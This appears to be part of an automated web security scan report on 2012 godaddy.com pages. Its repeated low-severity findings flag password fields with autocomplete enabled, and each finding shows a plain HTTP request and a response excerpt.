Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=imsigbtgdd4c2eer5xc4vowu; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=imsigbtgdd4c2eer5xc4vowu; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:52 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:52 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:52 GMT; path=/
Set-Cookie: SplitValue1=47; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:41:52 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/affiliates/affiliate-program.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=47; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:41:51 GMT
Connection: close
Content-Length: 129988


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><ti
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.13. http://www.godaddy.com/appraisal/domain-appraisal.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /appraisal/domain-appraisal.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /appraisal/domain-appraisal.aspx HTTP/1.1
Host: www.godaddy.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ws5jw4vh5tuzq2dphfi4us5a; preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; SplitValue1=75; flag1=cflag=us; currencypopin1=cdisplaypopin=false; GoogleADServicesgoogleadwordshome=zbnczeofsfcgdhzeqcxgcadeafyilatc; pathway=221039fb-1ef3-4a9c-9888-ebefb84fcda3; HPBackground=Danica2; MemPDC1=ljrecdtffbugaahgraqdyjybtizayfne; MemPDCLoc1=net; PCSplitValue1=1; GoogleADServicesgoogleadwordssearch=hbjjxbcaiaffadneicfbdagjqgiiggnd; BlueLithium_domainsearch=keydqgeemhudugljzexamaxfhjofnevf; BlueLithium=ldubxiuhpfmhtbbiyjmelhwaahghdbma; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=10; actioncount=; app_pathway=; visitor=vid=221039fb-1ef3-4a9c-9888-ebefb84fcda3; adc1=US; currency1=potableSourceStr=USD; traffic=cookies=1&referrer=http://www.godaddy.com/hosting/website-builder.aspx&sitename=www.godaddy.com&page=/hosting/website-builder.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=%26hpGoogleStatic%3d1&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=221039fb-1ef3-4a9c-9888-ebefb84fcda3&referringdomain=&split=75

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:54:56 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/appraisal/domain-appraisal.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=%26hpGoogleStatic%3d1&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=221039fb-1ef3-4a9c-9888-ebefb84fcda3&referringdomain=&split=75; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:54:55 GMT
Content-Length: 89534


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.14. http://www.godaddy.com/auctions/domain-auctions.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /auctions/domain-auctions.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /auctions/domain-auctions.aspx HTTP/1.1
Host: www.godaddy.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ws5jw4vh5tuzq2dphfi4us5a; preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; SplitValue1=75; flag1=cflag=us; currencypopin1=cdisplaypopin=false; GoogleADServicesgoogleadwordshome=zbnczeofsfcgdhzeqcxgcadeafyilatc; pathway=221039fb-1ef3-4a9c-9888-ebefb84fcda3; HPBackground=Danica2; MemPDC1=ljrecdtffbugaahgraqdyjybtizayfne; MemPDCLoc1=net; PCSplitValue1=1; GoogleADServicesgoogleadwordssearch=hbjjxbcaiaffadneicfbdagjqgiiggnd; BlueLithium_domainsearch=keydqgeemhudugljzexamaxfhjofnevf; BlueLithium=ldubxiuhpfmhtbbiyjmelhwaahghdbma; adc1=US; currency1=potableSourceStr=USD; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=11; actioncount=; app_pathway=; visitor=vid=221039fb-1ef3-4a9c-9888-ebefb84fcda3; traffic=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:55:08 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/auctions/domain-auctions.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=%26hpGoogleStatic%3d1&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=221039fb-1ef3-4a9c-9888-ebefb84fcda3&referringdomain=&split=75; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:55:08 GMT
Content-Length: 103848


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.15. http://www.godaddy.com/business/mobile-app.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /business/mobile-app.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /business/mobile-app.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=p4nsncifetrmahat41jiyo1p; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=p4nsncifetrmahat41jiyo1p; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:18 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:18 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:18 GMT; path=/
Set-Cookie: SplitValue1=41; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:41:18 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/business/mobile-app.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=41; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:41:17 GMT
Connection: close
Content-Length: 104675


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.16. http://www.godaddy.com/catalog.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /catalog.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /catalog.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=fri1wue3vd1ic4jrkxaauj3c; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=fri1wue3vd1ic4jrkxaauj3c; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:56 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:56 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:56 GMT; path=/
Set-Cookie: SplitValue1=67; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:41:56 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/catalog.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=67; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:41:56 GMT
Connection: close
Content-Length: 103706


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.17. http://www.godaddy.com/charity/roundupforcharity.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /charity/roundupforcharity.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /charity/roundupforcharity.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=rnjy2ferhnpoddivqs14a3i5; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=rnjy2ferhnpoddivqs14a3i5; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:39 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:39 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:39 GMT; path=/
Set-Cookie: SplitValue1=82; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:42:39 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/charity/roundupforcharity.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=82; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:42:38 GMT
Connection: close
Content-Length: 87659


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.18. http://www.godaddy.com/design/web-design.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /design/web-design.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /design/web-design.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=vmb2mxth3yafuxmcqzduelbs; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=vmb2mxth3yafuxmcqzduelbs; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:38 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:38 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:38 GMT; path=/
Set-Cookie: SplitValue1=51; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:59:38 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/design/web-design.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=51; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:59:38 GMT
Connection: close
Content-Length: 132017


<!DOCTYPE html>

<html>
<head id="ctl00_Head1"><link rel="Stylesheet" type="text/css" href="http://img2.wsimg.com/shared/css/1/styles_20120113.min.css" />
<title>Web Design | Professionally
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.19. http://www.godaddy.com/domains/bulk-domain-transfer.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /domains/bulk-domain-transfer.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /domains/bulk-domain-transfer.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=gigli1t4hd4patc250rutslm; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=gigli1t4hd4patc250rutslm; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:58:40 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:58:40 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:58:40 GMT; path=/
Set-Cookie: SplitValue1=89; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:58:40 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/bulk-domain-transfer.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=89; domain=godaddy.com; path=/
Set-Cookie: GoogleADServicesgoogleadwordssearch=yizaehuaxfkclacevbrcsbdjtcdfrayi; domain=godaddy.com; expires=Sat, 05-Mar-2022 01:58:40 GMT; path=/
Set-Cookie: BlueLithium_domainsearch=yizaehuaxfkclacevbrcsbdjtcdfrayi; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:58:39 GMT
Connection: close
Content-Length: 148315


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1">
<
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.20. http://www.godaddy.com/domains/domain-broker.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /domains/domain-broker.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /domains/domain-broker.aspx HTTP/1.1
Host: www.godaddy.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ws5jw4vh5tuzq2dphfi4us5a; preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; SplitValue1=75; flag1=cflag=us; currencypopin1=cdisplaypopin=false; GoogleADServicesgoogleadwordshome=zbnczeofsfcgdhzeqcxgcadeafyilatc; pathway=221039fb-1ef3-4a9c-9888-ebefb84fcda3; HPBackground=Danica2; MemPDC1=ljrecdtffbugaahgraqdyjybtizayfne; MemPDCLoc1=net; PCSplitValue1=1; GoogleADServicesgoogleadwordssearch=hbjjxbcaiaffadneicfbdagjqgiiggnd; BlueLithium=fjwdnezbeenauiycqahixbrhidddugih; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=7; actioncount=; app_pathway=; visitor=vid=221039fb-1ef3-4a9c-9888-ebefb84fcda3; adc1=US; currency1=potableSourceStr=USD; traffic=cookies=1&referrer=http://www.godaddy.com/domains/search.aspx&sitename=www.godaddy.com&page=/domains/search.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=%26hpGoogleStatic%3d1&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=221039fb-1ef3-4a9c-9888-ebefb84fcda3&referringdomain=&split=75; BlueLithium_domainsearch=cddeifefcecepgoaqgngnfviadxduebd

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:46:52 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/domain-broker.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=%26hpGoogleStatic%3d1&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=221039fb-1ef3-4a9c-9888-ebefb84fcda3&referringdomain=&split=75; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:46:51 GMT
Content-Length: 92192


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.21. http://www.godaddy.com/domains/domain-broker.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /domains/domain-broker.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /domains/domain-broker.aspx?isc=smfbfos HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=fm3k1sbrbcvo4nvttu1ph5yy; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=fm3k1sbrbcvo4nvttu1ph5yy; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:58:41 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:58:41 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:58:41 GMT; path=/
Set-Cookie: SplitValue1=62; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:58:41 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/domain-broker.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=isc=smfbfos&shopper=&privatelabelid=1&isc=smfbfos&clientip=174.36.218.2&referringpath=&referringdomain=&split=62; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:58:40 GMT
Connection: close
Content-Length: 94537


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?isc=smfbfos&ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.22. http://www.godaddy.com/domains/domain-broker.aspx/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /domains/domain-broker.aspx/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /domains/domain-broker.aspx/ HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=cmvdqsv45cvoeuzdhmnfwyki; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=cmvdqsv45cvoeuzdhmnfwyki; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:58:47 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:58:47 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:58:47 GMT; path=/
Set-Cookie: SplitValue1=13; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:58:47 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/domain-broker.aspx/&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=13; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:58:46 GMT
Connection: close
Content-Length: 92156


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

